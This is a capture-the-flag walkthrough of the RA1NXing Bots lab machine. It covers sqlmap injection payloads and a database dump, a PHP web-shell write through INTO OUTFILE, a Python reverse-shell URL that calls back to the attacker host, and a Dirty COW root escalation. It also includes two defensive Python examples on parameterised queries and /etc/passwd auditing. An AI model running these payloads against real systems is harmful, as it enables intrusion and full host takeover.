
vulhub series - 73 - RA1NXing Bots (detailed walkthrough)

Disclaimer: this article records the solution process for the RA1NXing Bots penetration-testing target machine; all operations were performed in a locally authorised environment. The content is for network security study and defensive research only; do not use it for any illegal purpose. Readers should comply with the Cybersecurity Law and related laws and regulations and help maintain the security of cyberspace.

Environment: https://download.vulnhub.com/botchallenges/RA1NXing_Bots.zip

I. Information Gathering

1. Discover the target IP address

arp-scan -l    # discover every IP address on the current subnet

┌──(root㉿kali)-[~]
└─# arp-scan -l    # discover every IP address on the current subnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.5
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1     0a:00:27:00:00:04       (Unknown: locally administered)
192.168.5.2     08:00:27:38:85:20       PCS Systemtechnik GmbH
192.168.5.14    08:00:27:4b:51:94       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 3 responded
nmap -sP 192.168.5.0/24

┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 05:50 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00013s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00013s latency).
MAC Address: 08:00:27:38:85:20 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.14
Host is up (0.00019s latency).
MAC Address: 08:00:27:4B:51:94 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.5
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.02 seconds
Target IP: 192.168.5.14

2. Probe the target's open ports

nmap -A -T4 -p 1-65535 192.168.5.14

┌──(root㉿kali)-[~]
└─# nmap -A -T4 -p 1-65535 192.168.5.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 05:51 -0400
Nmap scan report for 192.168.5.14
Host is up (0.00024s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
| ssh-hostkey:
|   1024 a2:24:9c:39:48:84:7f:da:1f:51:b9:0a:1b:45:df:aa (DSA)
|_  2048 35:f5:0e:fa:c3:6b:98:8a:25:e1:f8:bf:de:38:82:03 (RSA)
80/tcp   open  http    Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
| http-title: Site doesn't have a title (text/html).
|_Requested resource was /index.php?page=main
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
6667/tcp open  irc     IRCnet ircd
MAC Address: 08:00:27:4B:51:94 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 1 hop
Service Info: Host: irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.5.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.64 seconds
Open ports: 22, 80, 111, 6667

3. Directory enumeration

dirsearch -u http://192.168.5.14

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.5.14/_26-03-24_05-52-16.txt

Target: http://192.168.5.14/

[05:52:16] Starting:
[05:52:17] 403 -  243B  - /.ht_wsr.txt
[05:52:17] 403 -  240B  - /.htaccess.bak1
[05:52:17] 403 -  240B  - /.htaccess.sample
[05:52:17] 403 -  240B  - /.htaccess.save
[05:52:17] 403 -  240B  - /.htaccess.orig
[05:52:17] 403 -  241B  - /.htaccess_extra
[05:52:17] 403 -  241B  - /.htaccess_orig
[05:52:17] 403 -  239B  - /.htaccess_sc
[05:52:17] 403 -  238B  - /.htaccessOLD
[05:52:17] 403 -  239B  - /.htaccessOLD2
[05:52:17] 403 -  239B  - /.htaccessBAK
[05:52:17] 403 -  234B  - /.htm
[05:52:17] 403 -  234B  - /.html
[05:52:17] 403 -  244B  - /.htpasswd_test
[05:52:17] 403 -  241B  - /.httr-oauth
[05:52:17] 403 -  240B  - /.htpasswds
[05:52:28] 403 -  237B  - /cgi-bin/
[05:52:29] 200 -  126B  - /contact
[05:52:29] 200 -  126B  - /contact.php
[05:52:37] 200 -  147B  - /login
[05:52:38] 200 -  115B  - /main
[05:52:46] 403 -  241B  - /server-status/
[05:52:46] 403 -  240B  - /server-status

Task Completed

II. Exploitation

1. Information gathering

http://192.168.5.14/index.php

http://192.168.5.14/index.php?page=login

Capture the login request for this page with Yakit.

Save the captured request as the file sql.txt.

2. SQLMap

Databases

cat sql.txt
# enumerate the databases
sqlmap -r sql.txt --batch --dbs --level=3 --risk=2

┌──(root㉿kali)-[~]
└─# cat sql.txt
POST /index.php?page=login HTTP/1.1
Host: 192.168.5.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://192.168.5.14/index.php?page=login
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate
Origin: http://192.168.5.14
Content-Length: 17

user=1&password=1

┌──(root㉿kali)-[~]
└─# sqlmap -r sql.txt --batch --dbs --level=3 --risk=2
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.12#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:00:48 /2026-03-24/

[06:00:48] [INFO] parsing HTTP request from 'sql.txt'
[06:00:49] [INFO] resuming back-end DBMS 'mysql'
[06:00:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1
---
[06:00:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6 (squeeze)
web application technology: Apache 2.2.16, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[06:00:49] [INFO] fetching database names
[06:00:49] [INFO] resumed: 'information_schema'
[06:00:49] [INFO] resumed: 'mysql'
[06:00:49] [INFO] resumed: 'user_db'
available databases [3]:
[*] information_schema
[*] mysql
[*] user_db

[06:00:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 06:00:49 /2026-03-24/

The injection reveals the user_db database.

Tables

sqlmap -r sql.txt --batch -D user_db --tables

┌──(root㉿kali)-[~]
└─# sqlmap -r sql.txt --batch -D user_db --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.12#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:02:17 /2026-03-24/

[06:02:17] [INFO] parsing HTTP request from 'sql.txt'
[06:02:17] [INFO] resuming back-end DBMS 'mysql'
[06:02:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1
---
[06:02:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[06:02:17] [INFO] fetching tables for database: 'user_db'
[06:02:17] [INFO] retrieved: 'users'
Database: user_db
[1 table]
+-------+
| users |
+-------+

[06:02:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 06:02:17 /2026-03-24/

This gives the users table.

Columns

sqlmap -r sql.txt --batch -D user_db -T users --columns

┌──(root㉿kali)-[~]
└─# sqlmap -r sql.txt --batch -D user_db -T users --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.12#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:04:18 /2026-03-24/

[06:04:18] [INFO] parsing HTTP request from 'sql.txt'
[06:04:18] [INFO] resuming back-end DBMS 'mysql'
[06:04:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1
---
[06:04:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6 (squeeze)
web application technology: Apache 2.2.16, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[06:04:18] [INFO] fetching columns for table 'users' in database 'user_db'
[06:04:18] [INFO] retrieved: 'user'
[06:04:18] [INFO] retrieved: 'varchar(256)'
[06:04:18] [INFO] retrieved: 'pass'
[06:04:18] [INFO] retrieved: 'varchar(256)'
Database: user_db
Table: users
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| user   | varchar(256) |
| pass   | varchar(256) |
+--------+--------------+

[06:04:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 06:04:18 /2026-03-24/

Dump the column values

sqlmap -r sql.txt --batch -D user_db -T users --dump

┌──(root㉿kali)-[~]
└─# sqlmap -r sql.txt --batch -D user_db -T users --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.12#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:04:58 /2026-03-24/

[06:04:58] [INFO] parsing HTTP request from 'sql.txt'
[06:04:58] [INFO] resuming back-end DBMS 'mysql'
[06:04:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1
---
[06:04:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6 (squeeze)
web application technology: Apache 2.2.16, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[06:04:58] [INFO] fetching columns for table 'users' in database 'user_db'
[06:04:58] [INFO] resumed: 'user'
[06:04:58] [INFO] resumed: 'varchar(256)'
[06:04:58] [INFO] resumed: 'pass'
[06:04:58] [INFO] resumed: 'varchar(256)'
[06:04:58] [INFO] fetching entries for table 'users' in database 'user_db'
[06:04:58] [INFO] retrieved: 'root'
[06:04:58] [INFO] retrieved: 'totally not helpful password'
Database: user_db
Table: users
[1 entry]
+------------------------------+--------+
| pass                         | user   |
+------------------------------+--------+
| totally not helpful password | root   |
+------------------------------+--------+

[06:04:58] [INFO] table 'user_db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.5.14/dump/user_db/users.csv'
[06:04:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 06:04:58 /2026-03-24/

Combined result:

root/totally not helpful password

3. SQL command injection

sqlmap -r sql.txt --batch --file-read="/var/www/index.php"

┌──(root㉿kali)-[~]
└─# sqlmap -r sql.txt --batch --file-read="/var/www/index.php"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:06:00 /2026-03-24/

[06:06:00] [INFO] parsing HTTP request from 'sql.txt'
[06:06:00] [INFO] resuming back-end DBMS 'mysql'
[06:06:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: user=1' AND 1612=(SELECT (CASE WHEN (1612=1612) THEN 1612 ELSE (SELECT 5118 UNION SELECT 8882) END))-- -&password=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=1' AND (SELECT 6488 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(6488=6488,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShQM&password=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=1' AND (SELECT 6016 FROM (SELECT(SLEEP(5)))SzKC)-- xgJl&password=1
---
[06:06:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[06:06:00] [INFO] fingerprinting the back-end DBMS operating system
[06:06:00] [INFO] the back-end DBMS operating system is Linux
[06:06:00] [INFO] fetching file: '/var/www/index.php'
<?php
if(!isset($_GET['page']))
{
    header("Location: /index.php?page=main");
    exit();
}
?>
<html>
<head>
</head>
<body>
<a href="/index.php?page=main">Main</a><br/>
<a href="/index.php?page=login">Login</a><br/>
<a href="/index.php?page=contact.php">Contact Us</a><br/>
<?php
$page = basename($_GET['page']);
print(file_get_contents($page));
?>
<?php
if(isset($_POST['user']) && isset($_POST['password']))
{
    $user = $_POST['user'];
    $pass = $_POST['password'];
    $link = mysql_connect("localhost", "root", "some bad pass");
    mysql_select_db("user_db");
    $query = "SELECT * FROM users WHERE user='".$user."' AND pass='$pass'";
    $result = mysql_query($query) or die(mysql_error());
    if(mysql_num_rows($result) === 1)
    {
        print("YOU LOGGED IN!<br/>");
    }
    mysql_close($link);
}
?>
</b
do you want confirmation that the remote file '/var/www/index.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[06:06:00] [INFO] retrieved: '796'
[06:06:00] [INFO] the local file '/root/.local/share/sqlmap/output/192.168.5.14/files/_var_www_index.php' and the remote file '/var/www/index.php' have the same size (796 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/192.168.5.14/files/_var_www_index.php (same file)

[06:06:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.5.14'

[*] ending @ 06:06:00 /2026-03-24/
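The index.php source recovered above shows the root cause directly: the submitted user and password are concatenated into the SQL string, the application connects as the MySQL root account, passwords are stored in plaintext, and a single matching row counts as a login. The following Python example is added here (it is not part of the original post nor the target's code) to put that logic beside a hardened version. It rebuilds the box's users table in an in-memory SQLite database, runs the same three login attempts against the concatenating version and against a version that uses a parameterised query plus a salted PBKDF2 hash with a constant-time compare. The sample row is constructed from the credentials dumped above; SQLite is used instead of MySQL only so that it runs offline.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample account mirroring the single row dumped from user_db.users.
SAMPLE_USER = "root"
SAMPLE_PASS = "totally not helpful password"


def _vulnerable_db() -> sqlite3.Connection:
    """Same shape as the box's table: user and pass stored as plaintext."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", (SAMPLE_USER, SAMPLE_PASS))
    return db


def login_vulnerable(db: sqlite3.Connection, user: str, password: str) -> bool:
    """Port of the index.php logic: string concatenation, then
    'exactly one row' means success. Deliberately injectable."""
    query = "SELECT * FROM users WHERE user='" + user + "' AND pass='" + password + "'"
    rows = db.execute(query).fetchall()
    return len(rows) == 1


def _hash_password(password: str, salt: bytes) -> bytes:
    # Slow, salted hash; iteration count kept modest so the demo stays quick.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def _hardened_db() -> sqlite3.Connection:
    """Hardened schema: no plaintext, a per-user random salt and a slow hash."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT PRIMARY KEY, salt BLOB, hash BLOB)")
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        (SAMPLE_USER, salt, _hash_password(SAMPLE_PASS, salt)),
    )
    return db


def login_hardened(db: sqlite3.Connection, user: str, password: str) -> bool:
    """Parameterised lookup, then a constant-time comparison of the hash.
    The submitted strings never become part of the SQL text."""
    row = db.execute("SELECT salt, hash FROM users WHERE user = ?", (user,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(_hash_password(password, salt), stored)


def demo() -> dict:
    """Run the same three attempts against both implementations."""
    # In the concatenated query the quote closes the literal and '--' comments
    # out the password check; in the parameterised query it is just a username.
    bypass = "root' -- "
    results = {}
    for name, db, login in (
        ("vulnerable", _vulnerable_db(), login_vulnerable),
        ("hardened", _hardened_db(), login_hardened),
    ):
        results[name] = {
            "correct": login(db, SAMPLE_USER, SAMPLE_PASS),
            "wrong": login(db, SAMPLE_USER, "guess"),
            "bypass": login(db, bypass, "guess"),
        }
    return results


if __name__ == "__main__":
    for impl, outcome in demo().items():
        print(impl, outcome)
```

The same fix applies unchanged to the PHP side: `mysqli`/PDO prepared statements instead of the removed `mysql_*` functions, `password_hash()`/`password_verify()` instead of a plaintext `pass` column, and a dedicated database account with only SELECT on user_db rather than root (which is also what made the later file read and file write possible).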

Capture the request to the main page with Yakit and write a backdoor through the injection:

user=1' union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#&password=1

Verify the backdoor:

http://192.168.5.14/bd.php/?cmd=whoami

4. Reverse shell

Browser:

http://192.168.5.14/bd.php/?cmd=python%20-c%20%22import%20os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%27192.168.5.5%27,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%27/bin/sh%27,%27-i%27]);%22

Kali:

nc -lvnp 4444

Shell received:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.5.5] from (UNKNOWN) [192.168.5.14] 39244
/bin/sh: can't access tty; job control turned off
$

III. Privilege Escalation

1. Upgrade to a bash shell

python -c 'import pty; pty.spawn("/bin/bash")'

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@IRCC2:/var/www$

2. Check whether the current account has any usable privileged commands

sudo -l

www-data@IRCC2:/home/legit$ sudo -l
sudo -l
bash: sudo: command not found
www-data@IRCC2:/home/legit$

3. Check the kernel version

uname -a

www-data@IRCC2:/home/legit$ uname -a
uname -a
Linux IRCC2 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
www-data@IRCC2:/home/legit$

4. Privilege escalation via a kernel exploit (Kernel Exploit)

Kali:

wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
python -m http.server 80

┌──(root㉿kali)-[~]
└─# wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
--2026-03-24 06:18:39--  https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
正在解析主机 raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
正在连接 raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4795 (4.7K) [text/plain]
正在保存至: “dirty.c”

dirty.c                100%[============================>]   4.68K  --.-KB/s    用时 0s

2026-03-24 06:18:54 (74.4 MB/s) - 已保存 “dirty.c” [4795/4795])

┌──(root㉿kali)-[~]
└─# ls
3.jpg  dirty.c  lxd-alpine-builder  reports  sql.txt  steganopayload148505.txt  wordlist.txt

┌──(root㉿kali)-[~]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Target machine:

cd /tmp
wget http://192.168.5.5/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty

www-data@IRCC2:/home/legit$ cd /tmp
cd /tmp
www-data@IRCC2:/tmp$ wget http://192.168.5.5/dirty.c
wget http://192.168.5.5/dirty.c
--2026-03-24 06:21:02--  http://192.168.5.5/dirty.c
Connecting to 192.168.5.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4795 (4.7K) [text/x-csrc]
Saving to: `dirty.c'

100%[======================================>] 4,795       --.-K/s   in 0s

2026-03-24 06:21:02 (469 MB/s) - `dirty.c' saved [4795/4795]

www-data@IRCC2:/tmp$ gcc dirty.c -o dirty -pthread
gcc dirty.c -o dirty -pthread
/tmp/ccZiwsv1.o: In function `generate_password_hash':
dirty.c:(.text+0x16): undefined reference to `crypt'
collect2: ld returned 1 exit status
www-data@IRCC2:/tmp$ ls
ls
dirty.c
www-data@IRCC2:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@IRCC2:/tmp$ ls
ls
dirty  dirty.c
www-data@IRCC2:/tmp$ chmod +x dirty
chmod +x dirty
www-data@IRCC2:/tmp$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123456
Complete line:
toor:toKbqrb/U79xA:0:0:pwned:/root:/bin/bash

mmap: b76e4000

When it finishes we have the account toor with password 123456. Disconnect the reverse shell, reconnect, and log in as the new user toor with that password to obtain root.

su toor
Password: 123456
id

www-data@IRCC2:/var/www$ su toor
su toor
Password: 123456

toor@IRCC2:/var/www# id
id
uid=0(toor) gid=0(root) groups=0(root)
toor@IRCC2:/var/www# cd /root
cd /root
toor@IRCC2:~# ls
ls
decoded.php
toor@IRCC2:~# whoami
whoami
toor
toor@IRCC2:~#
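The escalation above leaves unmistakable traces in /etc/passwd: a uid-0 account that is not named root, a crypt hash sitting in the password field rather than the usual `x` pointing at /etc/shadow, and (as the exploit's own output says) a backup of the original file in /tmp/passwd.bak. The following Python example is added here (not from the original post) as an integrity check that flags those anomalies and diffs the live file against a trusted snapshot. Both passwd snapshots are constructed inline; the "after" version is assumed to have had its root line replaced by the generated toor line, which is the behaviour of the dirty.c used above, and the hash string is the one printed on the page rather than anything derived here.

```python
# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}

# Constructed snapshot of a clean /etc/passwd on a host like the target.
PASSWD_BEFORE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
legit:x:1000:1000:legit,,,:/home/legit:/bin/bash
"""

# Constructed post-exploit snapshot: root's line replaced by the generated
# entry shown in the walkthrough output (assumption: dirty.c overwrites line 1).
PASSWD_AFTER = """toor:toKbqrb/U79xA:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
legit:x:1000:1000:legit,,,:/home/legit:/bin/bash
"""


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        try:
            if len(fields) != 7:
                raise ValueError("field count")
            name, pw, uid, gid, gecos, home, shell = fields
            entries.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                            "gid": int(gid), "home": home, "shell": shell, "malformed": False})
        except ValueError:
            entries.append({"line": lineno, "name": line, "malformed": True})
    return entries


def audit_passwd(text: str) -> list:
    """Return human-readable findings for the anomalies a passwd-rewrite leaves behind."""
    findings = []
    saw_root = False
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        if e["name"] == "root" and e["uid"] == 0:
            saw_root = True
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: uid 0 but name is not root")
        if e["pw"] == "":
            findings.append(f"{e['name']}: empty password field")
        elif e["pw"] not in SHADOW_PLACEHOLDERS:
            findings.append(f"{e['name']}: password hash stored in /etc/passwd instead of /etc/shadow")
    if not saw_root:
        findings.append("no entry named root with uid 0")
    return findings


def diff_passwd(before: str, after: str) -> dict:
    """Compare a trusted snapshot (configuration management, a package backup)
    with the live file and report added, removed and modified accounts."""
    strip = lambda e: {k: v for k, v in e.items() if k != "line"}
    old = {e["name"]: strip(e) for e in parse_passwd(before) if not e["malformed"]}
    new = {e["name"]: strip(e) for e in parse_passwd(after) if not e["malformed"]}
    return {
        "added": sorted(new.keys() - old.keys()),
        "removed": sorted(old.keys() - new.keys()),
        "changed": sorted(n for n in old.keys() & new.keys() if old[n] != new[n]),
    }


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_AFTER):
        print("FINDING:", finding)
    print("DIFF:", diff_passwd(PASSWD_BEFORE, PASSWD_AFTER))
```

Run against a real host, `audit_passwd(open("/etc/passwd").read())` needs no baseline at all, which is what makes the uid-0 and hash-in-passwd checks useful in a quick triage; `diff_passwd` is the stronger signal when a known-good copy exists, and on this box /tmp/passwd.bak happens to be exactly that copy. The underlying fix is the one the kernel version line already points to: a 2.6.32 kernel from 2013 on an end-of-life Debian release needs patching, not detection.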

